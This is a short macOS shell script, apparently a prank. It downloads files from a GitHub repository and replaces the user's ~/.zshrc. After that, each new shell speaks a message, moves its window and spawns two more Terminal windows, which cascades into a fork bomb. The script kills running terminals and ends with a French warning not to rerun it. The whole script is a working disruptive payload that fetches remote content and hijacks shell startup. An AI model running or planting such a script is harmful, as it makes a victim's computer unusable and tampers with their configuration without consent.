curl https://raw.githubusercontent.com/noalexan/hellobebou/main/flag > ~/.flag ;

echo "#!/bin/sh" > ~/Desktop/disable ;
curl https://raw.githubusercontent.com/noalexan/hellobebou/main/disable >> ~/Desktop/disable ;
chmod 777 ~/Desktop/disable ;

if [ "$1" = "--no-disable" ]
then
	rm ~/Desktop/disable
fi

cp ~/.zshrc ~/.zshrccpy ;
echo "cat ~/.flag" > ~/.zshrc ;
echo "say hello bebou" >> ~/.zshrc ;
echo "printf '\e[8;49;100t'" >> ~/.zshrc ;
echo "printf '\e[3;'\$(( \$RANDOM % 980 + 1 ))';'\$(( \$RANDOM % 200 + 1 ))'t'" >> ~/.zshrc ;
echo "sleep 1" >> ~/.zshrc ;
echo "open /Applications/Utilities/Terminal.app -n" >> ~/.zshrc ;
echo "open /Applications/Utilities/Terminal.app -n" >> ~/.zshrc ;
pkill Terminal ;
pkill iTerm2 ;
clear ;
echo "\033[0;31mNe reexecute pas la commande...\033[0m" ;
